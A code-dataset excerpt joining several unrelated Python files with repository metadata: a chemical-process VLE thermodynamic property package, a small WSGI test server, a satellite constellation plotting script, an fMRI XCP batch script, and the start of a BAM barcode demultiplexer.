b._params.phase_list) / b.flow_mol)\n self.mole_frac_comp = Expression(self._params.component_list,\n rule=mole_frac_comp,\n doc='Mixture mole fractions')\n\n # Reaction Stoichiometry\n add_object_reference(self, \"phase_equilibrium_list_ref\",\n self._params.phase_equilibrium_list)\n\n if (self.config.has_phase_equilibrium and\n self.config.defined_state is False):\n # Definition of equilibrium temperature for smooth VLE\n self._teq = Var(\n initialize=self.temperature.value,\n units=pyunits.K,\n doc='Temperature for calculating phase equilibrium')\n self._t1 = Var(initialize=self.temperature.value,\n units=pyunits.K,\n doc='Intermediate temperature for calculating Teq')\n\n self.eps_1 = Param(default=0.01,\n units=pyunits.K,\n mutable=True,\n doc='Smoothing parameter for Teq')\n self.eps_2 = Param(default=0.0005,\n units=pyunits.K,\n mutable=True,\n doc='Smoothing parameter for Teq')\n\n # PSE paper Eqn 13\n def rule_t1(b):\n return b._t1 == 0.5*(\n b.temperature + b.temperature_bubble +\n sqrt((b.temperature-b.temperature_bubble)**2 +\n b.eps_1**2))\n self._t1_constraint = Constraint(rule=rule_t1)\n\n # PSE paper Eqn 14\n # TODO : Add option for supercritical extension\n def rule_teq(b):\n return b._teq == 0.5*(b._t1 + b.temperature_dew -\n sqrt((b._t1-b.temperature_dew)**2 +\n b.eps_2**2))\n self._teq_constraint = Constraint(rule=rule_teq)\n\n def rule_tr_eq(b, i):\n return b._teq / b._params.temperature_crit[i]\n self._tr_eq = Expression(\n self._params.component_list,\n rule=rule_tr_eq,\n doc='Component reduced temperatures')\n\n def rule_equilibrium(b, i):\n return b.fug_vap_comp[i] == b.fug_liq_comp[i]\n self.equilibrium_constraint = Constraint(\n self._params.component_list, rule=rule_equilibrium)\n\n# -----------------------------------------------------------------------------\n# Property Methods\n def _dens_mol_phase(self):\n self.dens_mol_phase = Var(self._params.phase_list,\n initialize=1.0,\n units=pyunits.mol*pyunits.m**-3,\n doc=\"Molar density\")\n\n def rule_dens_mol_phase(b, p):\n if p == 'Vap':\n return b._dens_mol_vap()\n else:\n return b._dens_mol_liq()\n self.eq_dens_mol_phase = Constraint(self._params.phase_list,\n rule=rule_dens_mol_phase)\n\n def _energy_internal_mol_phase_comp(self):\n self.energy_internal_mol_phase_comp = Var(\n self._params.phase_list,\n self._params.component_list,\n units=pyunits.J/pyunits.mol,\n doc=\"Phase-component molar specific internal energies\")\n\n def rule_energy_internal_mol_phase_comp(b, p, j):\n if p == 'Vap':\n return b.energy_internal_mol_phase_comp[p, j] == \\\n b.enth_mol_phase_comp[p, j] - \\\n const.gas_constant*(b.temperature -\n b._params.temeprature_ref)\n else:\n return b.energy_internal_mol_phase_comp[p, j] == \\\n b.enth_mol_phase_comp[p, j]\n self.eq_energy_internal_mol_phase_comp = Constraint(\n self._params.phase_list,\n self._params.component_list,\n rule=rule_energy_internal_mol_phase_comp)\n\n def _energy_internal_mol_phase(self):\n self.energy_internal_mol_phase = Var(\n self._params.phase_list,\n units=pyunits.J/pyunits.mol,\n doc='Phase molar specific internal energies')\n\n def rule_energy_internal_mol_phase(b, p):\n return b.energy_internal_mol_phase[p] == sum(\n b.energy_internal_mol_phase_comp[p, i] *\n b.mole_frac_phase_comp[p, i]\n for i in b._params.component_list)\n self.eq_energy_internal_mol_phase = Constraint(\n self._params.phase_list,\n rule=rule_energy_internal_mol_phase)\n\n def _enth_mol_phase_comp(self):\n self.enth_mol_phase_comp = Var(\n self._params.phase_list,\n self._params.component_list,\n initialize=7e5,\n units=pyunits.J/pyunits.mol,\n doc='Phase-component molar specific enthalpies')\n\n def rule_enth_mol_phase_comp(b, p, j):\n if p == 'Vap':\n return b._enth_mol_comp_vap(j)\n else:\n return b._enth_mol_comp_liq(j)\n self.eq_enth_mol_phase_comp = Constraint(\n self._params.phase_list,\n self._params.component_list,\n rule=rule_enth_mol_phase_comp)\n\n def _enth_mol_phase(self):\n self.enth_mol_phase = Var(\n self._params.phase_list,\n initialize=7e5,\n units=pyunits.J/pyunits.mol,\n doc='Phase molar specific enthalpies')\n\n def rule_enth_mol_phase(b, p):\n return b.enth_mol_phase[p] == sum(\n b.enth_mol_phase_comp[p, i] *\n b.mole_frac_phase_comp[p, i]\n for i in b._params.component_list)\n self.eq_enth_mol_phase = Constraint(self._params.phase_list,\n rule=rule_enth_mol_phase)\n\n def _entr_mol_phase_comp(self):\n self.entr_mol_phase_comp = Var(\n self._params.phase_list,\n self._params.component_list,\n units=pyunits.J/pyunits.mol/pyunits.K,\n doc='Phase-component molar specific entropies')\n\n def rule_entr_mol_phase_comp(b, p, j):\n if p == 'Vap':\n return b._entr_mol_comp_vap(j)\n else:\n return b._entr_mol_comp_liq(j)\n self.eq_entr_mol_phase_comp = Constraint(\n self._params.phase_list,\n self._params.component_list,\n rule=rule_entr_mol_phase_comp)\n\n def _entr_mol_phase(self):\n self.entr_mol_phase = Var(\n self._params.phase_list,\n units=pyunits.J/pyunits.mol/pyunits.K,\n doc='Phase molar specific enthropies')\n\n def rule_entr_mol_phase(b, p):\n return b.entr_mol_phase[p] == sum(\n b.entr_mol_phase_comp[p, i] *\n b.mole_frac_phase_comp[p, i]\n for i in b._params.component_list)\n self.eq_entr_mol_phase = Constraint(self._params.phase_list,\n rule=rule_entr_mol_phase)\n\n# -----------------------------------------------------------------------------\n# General Methods\n def get_material_flow_terms(self, p, j):\n \"\"\"Create material flow terms for control volume.\"\"\"\n if not self.is_property_constructed(\"material_flow_terms\"):\n try:\n def rule_material_flow_terms(blk, p, j):\n return blk.flow_mol_phase_comp[p, j]\n self.material_flow_terms = Expression(\n self.params.phase_list,\n self.params.component_list,\n rule=rule_material_flow_terms\n )\n except AttributeError:\n self.del_component(self.material_flow_terms)\n\n if j in self.params.component_list:\n return self.material_flow_terms[p, j]\n else:\n return 0\n\n def get_enthalpy_flow_terms(self, p):\n \"\"\"Create enthalpy flow terms.\"\"\"\n if not self.is_property_constructed(\"enthalpy_flow_terms\"):\n try:\n def rule_enthalpy_flow_terms(blk, p):\n return blk.flow_mol_phase[p] * blk.enth_mol_phase[p]\n self.enthalpy_flow_terms = Expression(\n self.params.phase_list,\n rule=rule_enthalpy_flow_terms\n )\n except AttributeError:\n self.del_component(self.enthalpy_flow_terms)\n return self.enthalpy_flow_terms[p]\n\n def get_material_density_terms(self, p, j):\n \"\"\"Create material density terms.\"\"\"\n if not self.is_property_constructed(\"material_density_terms\"):\n try:\n def rule_material_density_terms(b, p, j):\n return self.dens_mol_phase[p] * \\\n self.mole_frac_phase_comp[p, j]\n self.material_density_terms = Expression(\n self.params.phase_list,\n self.params.component_list,\n rule=rule_material_density_terms\n )\n except AttributeError:\n self.del_component(self.material_density_terms)\n\n if j in self.params.component_list:\n return self.material_density_terms[p, j]\n else:\n return 0\n\n def get_enthalpy_density_terms(self, p):\n \"\"\"Create energy density terms.\"\"\"\n if not self.is_property_constructed(\"enthalpy_density_terms\"):\n try:\n def rule_energy_density_terms(b, p):\n return (self.dens_mol_phase[p] *\n self.energy_internal_mol_phase[p])\n self.energy_density_terms = Expression(\n self.params.phase_list,\n rule=rule_energy_density_terms\n )\n except AttributeError:\n self.del_component(self.energy_density_terms)\n return self.enthalpy_density_terms[p]\n\n def default_material_balance_type(self):\n return MaterialBalanceType.componentPhase\n\n def default_energy_balance_type(self):\n return EnergyBalanceType.enthalpyTotal\n\n def get_material_flow_basis(b):\n return MaterialFlowBasis.molar\n\n def define_state_vars(self):\n \"\"\"Define state vars.\"\"\"\n return {\"flow_mol_phase_comp\": self.flow_mol_phase_comp,\n \"temperature\": self.temperature,\n \"pressure\": self.pressure}\n\n # Property package utility functions\n def calculate_bubble_point_temperature(self, clear_components=True):\n \"\"\"\"To compute the bubble point temperature of the mixture.\"\"\"\n\n if hasattr(self, \"eq_temperature_bubble\"):\n # Do not delete components if the block already has the components\n clear_components = False\n\n calculate_variable_from_constraint(self.temperature_bubble,\n self.eq_temperature_bubble)\n\n return self.temperature_bubble.value\n\n if clear_components is True:\n self.del_component(self.eq_temperature_bubble)\n self.del_component(self._p_sat_bubbleT)\n self.del_component(self.temperature_bubble)\n\n def calculate_dew_point_temperature(self, clear_components=True):\n \"\"\"\"To compute the dew point temperature of the mixture.\"\"\"\n\n if hasattr(self, \"eq_temperature_dew\"):\n # Do not delete components if the block already has the components\n clear_components = False\n\n calculate_variable_from_constraint(self.temperature_dew,\n self.eq_temperature_dew)\n\n return self.temperature_dew.value\n\n # Delete the var/constraint created in this method that are part of the\n # IdealStateBlock if the user desires\n if clear_components is True:\n self.del_component(self.eq_temperature_dew)\n self.del_component(self._p_sat_dewT)\n self.del_component(self.temperature_dew)\n\n def calculate_bubble_point_pressure(self, clear_components=True):\n \"\"\"\"To compute the bubble point pressure of the mixture.\"\"\"\n\n if hasattr(self, \"eq_pressure_bubble\"):\n # Do not delete components if the block already has the components\n clear_components = False\n\n calculate_variable_from_constraint(self.pressure_bubble,\n self.eq_pressure_bubble)\n\n return self.pressure_bubble.value\n\n # Delete the var/constraint created in this method that are part of the\n # IdealStateBlock if the user desires\n if clear_components is True:\n self.del_component(self.eq_pressure_bubble)\n self.del_component(self._p_sat_bubbleP)\n self.del_component(self.pressure_bubble)\n\n def calculate_dew_point_pressure(self, clear_components=True):\n \"\"\"\"To compute the dew point pressure of the mixture.\"\"\"\n\n if hasattr(self, \"eq_pressure_dew\"):\n # Do not delete components if the block already has the components\n clear_components = False\n\n calculate_variable_from_constraint(self.pressure_dew,\n self.eq_pressure_dew)\n\n return self.pressure_dew.value\n\n # Delete the var/constraint created in this method that are part of the\n # IdealStateBlock if the user desires\n if clear_components is True:\n self.del_component(self.eq_pressure_dew)\n self.del_component(self._p_sat_dewP)\n self.del_component(self.pressure_dew)\n\n# -----------------------------------------------------------------------------\n# Bubble and Dew Points\n# Ideal-Ideal properties allow for the simplifications below\n# Other methods require more complex equations with shadow compositions\n\n# For future work, propose the following:\n# Core class writes a set of constraints Phi_L_i == Phi_V_i\n# Phi_L_i and Phi_V_i make calls to submethods which add shadow compositions\n# as needed\n def _temperature_bubble(self):\n self.temperature_bubble = Param(initialize=33.0,\n units=pyunits.K,\n doc=\"Bubble point temperature\")\n\n def _temperature_dew(self):\n\n self.temperature_dew = Var(initialize=298.15,\n units=pyunits.K,\n doc=\"Dew point temperature\")\n\n def rule_psat_dew(b, j):\n return 1e5*pyunits.Pa*10**(b._params.pressure_sat_coeff_A[j] -\n b._params.pressure_sat_coeff_B[j] /\n (b.temperature_dew +\n b._params.pressure_sat_coeff_C[j]))\n\n try:\n # Try to build expression\n self._p_sat_dewT = Expression(self._params.component_list,\n rule=rule_psat_dew)\n\n def rule_temp_dew(b):\n return b.pressure * sum(b.mole_frac_comp[i] /\n b._p_sat_dewT[i]\n for i in ['toluene', 'benzene']) \\\n - 1 == 0\n self.eq_temperature_dew = Constraint(rule=rule_temp_dew)\n except AttributeError:\n # If expression fails, clean up so that DAE can try again later\n # Deleting only var/expression as expression construction will fail\n # first; if it passes then constraint construction will not fail.\n self.del_component(self.temperature_dew)\n self.del_component(self._p_sat_dewT)\n\n def _pressure_bubble(self):\n self.pressure_bubble = Param(initialize=1e8,\n units=pyunits.Pa,\n doc=\"Bubble point pressure\")\n\n def _pressure_dew(self):\n self.pressure_dew = Var(initialize=298.15,\n units=pyunits.Pa,\n doc=\"Dew point pressure\")\n\n def rule_psat_dew(b, j):\n return 1e5*pyunits.Pa*10**(b._params.pressure_sat_coeff_A[j] -\n b._params.pressure_sat_coeff_B[j] /\n (b.temperature +\n b._params.pressure_sat_coeff_C[j]))\n\n try:\n # Try to build expression\n self._p_sat_dewP = Expression(self._params.component_list,\n rule=rule_psat_dew)\n\n def rule_pressure_dew(b):\n return b.pressure_dew * \\\n sum(b.mole_frac_comp[i] / b._p_sat_dewP[i]\n for i in ['toluene', 'benzene']) \\\n - 1 == 0\n self.eq_pressure_dew = Constraint(rule=rule_pressure_dew)\n except AttributeError:\n # If expression fails, clean up so that DAE can try again later\n # Deleting only var/expression as expression construction will fail\n # first; if it passes then constraint construction will not fail.\n self.del_component(self.pressure_dew)\n self.del_component(self._p_sat_dewP)\n\n# -----------------------------------------------------------------------------\n# Liquid phase properties\n def _dens_mol_liq(b):\n return b.dens_mol_phase['Liq'] == 1e3*sum(\n b.mole_frac_phase_comp['Liq', j] *\n b._params.dens_liq_param_1[j] /\n b._params.dens_liq_param_2[j] **\n (1 + (1-b.temperature /\n b._params.dens_liq_param_3[j]) **\n b._params.dens_liq_param_4[j])\n for j in ['benzene', 'toluene'])\n\n def _fug_liq_comp(self):\n def fug_liq_comp_rule(b, i):\n if i in ['hydrogen', 'methane']:\n return b.mole_frac_phase_comp['Liq', i]\n else:\n return b.pressure_sat[i] * b.mole_frac_phase_comp['Liq', i]\n self.fug_liq_comp = Expression(self._params.component_list,\n rule=fug_liq_comp_rule)\n\n def _pressure_sat(self):\n self.pressure_sat = Var(self._params.component_list,\n initialize=101325,\n units=pyunits.Pa,\n doc=\"Vapor pressure\")\n\n def rule_P_sat(b, j):\n return ((log10(b.pressure_sat[j]/pyunits.Pa*1e-5) -\n b._params.pressure_sat_coeff_A[j]) *\n (b._teq + b._params.pressure_sat_coeff_C[j])) == \\\n -b._params.pressure_sat_coeff_B[j]\n self.eq_pressure_sat = Constraint(self._params.component_list,\n rule=rule_P_sat)\n\n def _enth_mol_comp_liq(b, j):\n return b.enth_mol_phase_comp['Liq', j] * 1E3 == \\\n ((b._params.cp_ig_5['Liq', j] / 5) *\n (b.temperature**5 - b._params.temperature_ref**5)\n + (b._params.cp_ig_4['Liq', j] / 4) *\n (b.temperature**4 - b._params.temperature_ref**4)\n + (b._params.cp_ig_3['Liq', j] / 3) *\n (b.temperature**3 - b._params.temperature_ref**3)\n + (b._params.cp_ig_2['Liq', j] / 2) *\n (b.temperature**2 - b._params.temperature_ref**2)\n + b._params.cp_ig_1['Liq', j] *\n (b.temperature - b._params.temperature_ref))\n\n def _entr_mol_comp_liq(b, j):\n return b.entr_mol_phase_comp['Liq', j] * 1E3 == (\n ((b._params.cp_ig_5['Liq', j] / 4) *\n (b.temperature**4 - b._params.temperature_ref**4)\n + (b._params.cp_ig_4['Liq', j] / 3) *\n (b.temperature**3 - b._params.temperature_ref**3)\n + (b._params.cp_ig_3['Liq', j] / 2) *\n (b.temperature**2 - b._params.temperature_ref**2)\n + b._params.cp_ig_2['Liq', j] *\n (b.temperature - b._params.temperature_ref)\n + b._params.cp_ig_1['Liq', j] *\n log(b.temperature / b._params.temperature_ref)) -\n const.gas_constant *\n log(b.mole_frac_phase_comp['Liq', j]*b.pressure /\n b._params.pressure_ref))\n\n# -----------------------------------------------------------------------------\n# Vapour phase properties\n def _dens_mol_vap(b):\n return b.pressure == (b.dens_mol_phase['Vap'] *\n const.gas_constant *\n b.temperature)\n\n def _fug_vap_comp(self):\n def fug_vap_comp_rule(b, i):\n if i in ['hydrogen', 'methane']:\n return 1e-6\n else:\n return b.mole_frac_phase_comp['Vap', i] * b.pressure\n self.fug_vap_comp = Expression(self._params.component_list,\n rule=fug_vap_comp_rule)\n\n def _dh_vap(self):\n # heat of vaporization\n add_object_reference(self, \"dh_vap\",\n self._params.dh_vap)\n\n def _ds_vap(self):\n # entropy of vaporization = dh_Vap/T_boil\n # TODO : something more rigorous would be nice\n self.ds_vap = Var(self._params.component_list,\n initialize=86,\n units=pyunits.J/pyunits.mol/pyunits.K,\n doc=\"Entropy of vaporization\")\n\n def rule_ds_vap(b, j):\n return b.dh_vap[j] == (b.ds_vap[j] *\n b._params.temperature_boil[j])\n self.eq_ds_vap = Constraint(self._params.component_list,\n rule=rule_ds_vap)\n\n def _enth_mol_comp_vap(b, j):\n return b.enth_mol_phase_comp['Vap', j] == b.dh_vap[j] + \\\n ((b._params.cp_ig_5['Vap', j] / 5) *\n (b.temperature**5 - b._params.temperature_ref**5)\n + (b._params.cp_ig_4['Vap', j] / 4) *\n (b.temperature**4 - b._params.temperature_ref**4)\n + (b._params.cp_ig_3['Vap', j] / 3) *\n (b.temperature**3 - b._params.temperature_ref**3)\n + (b._params.cp_ig_2['Vap', j] / 2) *\n (b.temperature**2 - b._params.temperature_ref**2)\n + b._params.cp_ig_1['Vap', j] *\n (b.temperature - b._params.temperature_ref))\n\n def _entr_mol_comp_vap(b, j):\n return b.entr_mol_phase_comp['Vap', j] == (\n b.ds_vap[j] +\n ((b._params.cp_ig_5['Vap', j] / 4) *\n (b.temperature**4 - b._params.temperature_ref**4)\n + (b._params.cp_ig_4['Vap', j] / 3) *\n (b.temperature**3 - b._params.temperature_ref**3)\n + (b._params.cp_ig_3['Vap', j] / 2) *\n (b.temperature**2 - b._params.temperature_ref**2)\n + b._params.cp_ig_2['Vap', j] *\n (b.temperature - b._params.temperature_ref)\n + b._params.cp_ig_1['Vap', j] *\n log(b.temperature / b._params.temperature_ref)) -\n const.gas_constant *\n log(b.mole_frac_phase_comp['Vap', j]*b.pressure /\n b._params.pressure_ref))\n\n def calculate_scaling_factors(self):\n # Get default scale factors\n super().calculate_scaling_factors()\n\n is_two_phase = len(self._params.phase_list) == 2\n sf_flow = iscale.get_scaling_factor(\n self.flow_mol, default=1, warning=True)\n sf_T = iscale.get_scaling_factor(\n self.temperature, default=1, warning=True)\n sf_P = iscale.get_scaling_factor(\n self.pressure, default=1, warning=True)\n\n if self.is_property_constructed(\"_teq\"):\n iscale.set_scaling_factor(self._teq, sf_T)\n if self.is_property_constructed(\"_teq_constraint\"):\n iscale.constraint_scaling_transform(\n self._teq_constraint, sf_T, overwrite=False)\n\n if self.is_property_constructed(\"_t1\"):\n iscale.set_scaling_factor(self._t1, sf_T)\n if self.is_property_constructed(\"_t1_constraint\"):\n iscale.constraint_scaling_transform(\n self._t1_constraint, sf_T, overwrite=False)\n\n if self.is_property_constructed(\"_mole_frac_pdew\"):\n iscale.set_scaling_factor(self._mole_frac_pdew, 1e3)\n iscale.constraint_scaling_transform(\n self._sum_mole_frac_pdew, 1e3, overwrite=False)\n\n if self.is_property_constructed(\"total_flow_balance\"):\n iscale.constraint_scaling_transform(\n self.total_flow_balance, sf_flow, overwrite=False)\n\n if self.is_property_constructed(\"component_flow_balances\"):\n for i, c in self.component_flow_balances.items():\n if is_two_phase:\n s = iscale.get_scaling_factor(\n self.mole_frac_comp[i], default=1, warning=True)\n s *= sf_flow\n iscale.constraint_scaling_transform(c, s, overwrite=False)\n else:\n s = iscale.get_scaling_factor(\n self.mole_frac_comp[i], default=1, warning=True)\n iscale.constraint_scaling_transform(c, s, overwrite=False)\n\n if self.is_property_constructed(\"dens_mol_phase\"):\n for c in self.eq_dens_mol_phase.values():\n iscale.constraint_scaling_transform(c, sf_P, overwrite=False)\n\n if self.is_property_constructed(\"dens_mass_phase\"):\n for p, c in self.eq_dens_mass_phase.items():\n sf = iscale.get_scaling_factor(\n self.dens_mass_phase[p], default=1, warning=True)\n iscale.constraint_scaling_transform(c, sf, overwrite=False)\n\n if self.is_property_constructed(\"enth_mol_phase\"):\n for p, c in self.eq_enth_mol_phase.items():\n sf = iscale.get_scaling_factor(\n self.enth_mol_phase[p], default=1, warning=True)\n iscale.constraint_scaling_transform(c, sf, overwrite=False)\n\n if self.is_property_constructed(\"enth_mol\"):\n sf = iscale.get_scaling_factor(\n self.enth_mol, default=1, warning=True)\n sf *= sf_flow\n iscale.constraint_scaling_transform(\n self.eq_enth_mol, sf, overwrite=False)\n\n if self.is_property_constructed(\"entr_mol_phase\"):\n for p, c in self.eq_entr_mol_phase.items():\n sf = iscale.get_scaling_factor(\n self.entr_mol_phase[p], default=1, warning=True)\n iscale.constraint_scaling_transform(c, sf, overwrite=False)\n\n if self.is_property_constructed(\"entr_mol\"):\n sf = iscale.get_scaling_factor(\n self.entr_mol, default=1, warning=True)\n sf *= sf_flow\n iscale.constraint_scaling_transform(\n self.eq_entr_mol, sf, overwrite=False)\n\n if self.is_property_constructed(\"gibbs_mol_phase\"):\n for p, c in self.eq_gibbs_mol_phase.items():\n sf = iscale.get_scaling_factor(\n self.gibbs_mol_phase[p], default=1, warning=True)\n iscale.constraint_scaling_transform(c, sf, overwrite=False)\n","repo_name":"IDAES/examples-pse","sub_path":"pkg/idaes_examples/common/hda/hda_ideal_VLE.py","file_name":"hda_ideal_VLE.py","file_ext":"py","file_size_in_byte":54495,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"44"} +{"seq_id":"39685869627","text":"import json\n\nfrom six.moves.urllib import parse as urlparse\n\n\nMETHODS = ['GET', 'PUT', 'POST', 'DELETE', 'PATCH']\n\n\nclass SimpleWsgi(object):\n \"\"\"A simple wsgi application to use in tests.\"\"\"\n\n def __call__(self, environ, start_response):\n request_method = environ['REQUEST_METHOD'].upper()\n query_data = urlparse.parse_qs(environ.get('QUERY_STRING', ''))\n request_url = environ.get('REQUEST_URI',\n environ.get('RAW_URI', 'unknown'))\n accept_header = environ.get('HTTP_ACCEPT')\n content_type_header = environ.get('CONTENT_TYPE', '')\n\n request_url = self._fully_qualify(environ, request_url)\n\n if accept_header:\n response_content_type = accept_header\n else:\n response_content_type = 'application/json'\n\n headers = [\n ('X-Gabbi-method', request_method),\n ('Content-Type', response_content_type),\n ('X-Gabbi-url', request_url),\n ]\n\n if request_method == 'DIE':\n raise Exception('because you asked me to')\n\n if request_method not in METHODS:\n headers.append(\n ('Allow', ', '.join(METHODS)))\n start_response('405 Method Not Allowed', headers)\n return []\n\n if request_method.startswith('P'):\n body = environ['wsgi.input'].read()\n if body:\n if not content_type_header:\n start_response('400 Bad request', headers)\n return []\n if content_type_header == 'application/json':\n body_data = json.loads(body.decode('utf-8'))\n if query_data:\n query_data.update(body_data)\n else:\n query_data = body_data\n headers.append(('Location', request_url))\n\n start_response('200 OK', headers)\n\n query_output = json.dumps(query_data)\n return [query_output.encode('utf-8')]\n\n @staticmethod\n def _fully_qualify(environ, url):\n \"\"\"Turn a URL path into a fully qualified URL.\"\"\"\n path, query, fragment = urlparse.urlsplit(url)[2:]\n server_name = environ.get('SERVER_NAME')\n server_port = environ.get('SERVER_PORT')\n server_scheme = environ.get('wsgi.url_scheme')\n if server_port not in ['80', '443']:\n netloc = '%s:%s' % (server_name, server_port)\n else:\n netloc = server_name\n\n return urlparse.urlunsplit((server_scheme, netloc, path,\n query, fragment))\n","repo_name":"sugaryog/clearlinux","sub_path":"gabbi-0.99.1/gabbi/simple_wsgi.py","file_name":"simple_wsgi.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19850603092","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef plotWithAnnotate(results):\n x = results[:,4]\n y = results[:,5]\n alt = results[:,0]\n sats = results[:,1]\n planes = results[:,2]\n #f = results[:,3]\n names = []\n for i in range(len(results)):\n names.append(\"%ikm:(%i,%i,%i)\"%(alt[i],sats[i],planes[i],1))\n \n c = planes\n norm = plt.Normalize(np.amin(c),np.amax(c))\n cmap = plt.cm.PuOr_r\n\n fig,ax = plt.subplots()\n sc = plt.scatter(x,y,c=c,cmap=cmap,norm=norm)\n cb = plt.colorbar(orientation='vertical')\n cb.set_label(label=\"Planes\",size=30)\n cb.ax.tick_params(labelsize=20)\n annot = ax.annotate(\"\", xy=(0,0), xytext=(20,20),textcoords=\"offset points\",\n bbox=dict(boxstyle=\"round\", fc=\"w\"),\n arrowprops=dict(arrowstyle=\"->\"))\n annot.set_visible(False)\n \n \n def perm_annot(ind):\n #pos = []\n for i in range(len(ind)):\n annot = ax.annotate(\"\", xy=(0,0), xytext=(-40,-40),textcoords=\"offset points\",\n bbox=dict(boxstyle=\"round\", fc=\"w\"),\n arrowprops=dict(arrowstyle=\"->\"))\n pos = sc.get_offsets()[ind[i]]\n annot.xy = pos\n #text = \"{}, {}\".format(\" \".join(list(map(str,ind[\"ind\"]))), \n # \" \".join([names[n] for n in ind[\"ind\"]]))\n text = \"{}\".format(\" \".join([names[ind[i]]]))\n annot.set_text(text)\n #annot.get_bbox_patch().set_facecolor(cmap(norm(c[ind[\"ind\"][0]])))\n annot.get_bbox_patch().set_alpha(0.4)\n annot.set_visible(True)\n\n def update_annot(ind):\n \n pos = sc.get_offsets()[ind[\"ind\"][0]]\n annot.xy = pos\n #text = \"{}, {}\".format(\" \".join(list(map(str,ind[\"ind\"]))), \n # \" \".join([names[n] for n in ind[\"ind\"]]))\n text = \"{}\".format(\" \".join([names[n] for n in ind[\"ind\"]]))\n annot.set_text(text)\n #annot.get_bbox_patch().set_facecolor(cmap(norm(c[ind[\"ind\"][0]])))\n annot.get_bbox_patch().set_alpha(0.4)\n \n allind = [48,26,13,774]\n\n perm_annot(allind)\n fig.canvas.draw_idle()\n \n def hover(event):\n vis = annot.get_visible()\n if event.inaxes == ax:\n cont, ind = sc.contains(event)\n print(ind)\n #for n in ind[\"ind\"]:\n # allind[\"ind\"].append(n)\n if cont:\n update_annot(ind)\n annot.set_visible(True)\n fig.canvas.draw_idle()\n else:\n if vis:\n #annot.set_visible(False)\n fig.canvas.draw_idle()\n\n #fig.canvas.mpl_connect(\"motion_notify_event\", hover)\n fig.canvas.mpl_connect(\"button_press_event\",hover)\n \n \n plt.suptitle(\"Cost (USD) vs Revisit Time (Hrs) for different constellations\",size=40)\n plt.xlabel(\"Revist Time (hr)\",size=30)\n plt.ylabel(\"Cost (USD)\",size=30)\n plt.show()\n\ndef readCSV():\n data = []\n f = open(\"results.csv\",'r')\n lines = f.readlines()\n for line in lines:\n row = line.strip('\\n').split(',')\n trow = []\n for i in row:\n trow.append(float(i))\n data.append(trow)\n\n return np.array(data)\n\n\n\ndef SSOinclination(alt:float) -> float:\n \"\"\"\n SSO inclination will return the required Sun-Synchronous Inclination (degrees) as a functino of altitude (in KM) using J2 pertubation\n Inputs:\n -Altitude in KM\n Output:\n -Inclination in degrees\n \"\"\"\n from math import pi,sqrt,acos\n Re = 6378.1 #Radius of Earth in KM\n mu = 3.986e14 #Mu of earth in m^3/s^2\n\n J2 = 1.08262668e-3\n omegaDot = 2*pi/365/86400\n\n a = (alt+Re)*1000\n n = sqrt(mu/pow(a,3))\n return acos(-2/3 * omegaDot/n/J2 * pow(a/Re/1000,2))*180/pi\n#print(SSOinclination(500))\nresults = (readCSV())\n\nAltFront = [[500,10,5],[500,7,7],[500,5,5],[750,3,3]]\nci = []\nFront = AltFront\nfor point in Front:\n Awhere = np.argwhere(results[:,0]==point[0])\n Swhere = np.argwhere(results[:,1]==point[1])\n Pwhere = np.argwhere(results[:,2]==point[2])\n ascom = []\n aspcom = []\n for a in Awhere:\n for s in Swhere:\n if a ==s:\n ascom.append(a)\n for c in ascom:\n for p in Pwhere:\n if c==p:\n aspcom.append(c)\n ci.append(aspcom)\n\n\nprint(ci)\n\nplotWithAnnotate(results)","repo_name":"JasonSaladiner/3D-CHESS","sub_path":"3D-CHESS Software/Orbit Selection/OrbitSelectionGraphing.py","file_name":"OrbitSelectionGraphing.py","file_ext":"py","file_size_in_byte":4430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35504837509","text":"import os\nfrom glob import glob\nimport pennlinckit\n\nsubs = sorted(glob('/cbica/projects/ISTAGING_FMRI/datasets/*/fmriprep/*'))\nsubids = [os.path.split(x)[1] for x in subs]\nfprep_dirs = [os.path.split(x)[0] for x in subs]\nxcp_dirs = [os.path.join(os.path.split(x)[0],'xcp') for x in fprep_dirs]\n\nsubid = subids[pennlinckit.utils.get_sge_task_id()]\nfpdir = fprep_dirs[pennlinckit.utils.get_sge_task_id()]\nxcpdir = xcp_dirs[pennlinckit.utils.get_sge_task_id()]\n\ncmd = 'singularity run -B /cbica/projects/ISTAGING_FMRI/:/home/user/data/ ~/xcpabcd.simg %s %s participant --participant_label %s --despike -p 36P --lower-bpf 0.01 --upper-bpf 0.08'%(fpdir,xcpdir,subid)\nos.system(cmd)\n","repo_name":"PennLINC/iStaging_fmri","sub_path":"XCP_subloop.py","file_name":"XCP_subloop.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12989828114","text":"import pysam\nimport os\nimport argparse\nimport pandas as pd\nparser = argparse.ArgumentParser()\nparser.add_argument('-b', '--bam', type=str,\n help='bam input')\nparser.add_argument('-o', '--output', type=str,\n help='output file directory')\nparser.add_argument('-t', '--tag', type=str,\n help='BAM tag')\nparser.add_argument('-r', '--reference', type=str,\n help='Input barcode list')\n\n\n\nif __name__ == \"__main__\":\n # parsing arguments\n args = parser.parse_args()\n input_file = pysam.AlignmentFile(args.bam)\n outdir = args.output;\n prefix = args.bam.split('/')[-1].split(\".bam\")[0]\n barcode_list = args.reference\n barcode_list = set(list(pd.read_csv(barcode_list, header=None).iloc[:,0]))\n tag = args.tag\n\n created_sam = set()\n opened_sam = {}\n opened_sam_queue = []\n max_queue_length = 100\n\n\n for read in input_file.fetch():\n name = int(read.qname.split(\".\")[-1])\n bam_fp = None\n try:\n barcode = read.get_tag(tag)\n except KeyError:\n continue\n if barcode not in barcode_list:\n continue\n if barcode not in opened_sam.keys():\n if len(opened_sam_queue) == max_queue_length:\n poped_name = opened_sam_queue.pop()\n fp = opened_sam.pop(poped_name)\n fp.close()\n if barcode not in created_sam:\n opened_sam[barcode] = pysam.AlignmentFile(os.path.join(outdir, \"{}.{}.demultiplexed.sam\".format(prefix, barcode)), 'w', template = input_file)\n opened_sam[barcode].close()\n opened_sam[barcode] = open(os.path.join(outdir, \"{}.{}.demultiplexed.sam\".format(prefix, barcode)), \"a\")\n created_sam.add(barcode)\n else:\n opened_sam[barcode] = open(os.path.join(outdir, \"{}.{}.demultiplexed.sam\".format(prefix, barcode)), 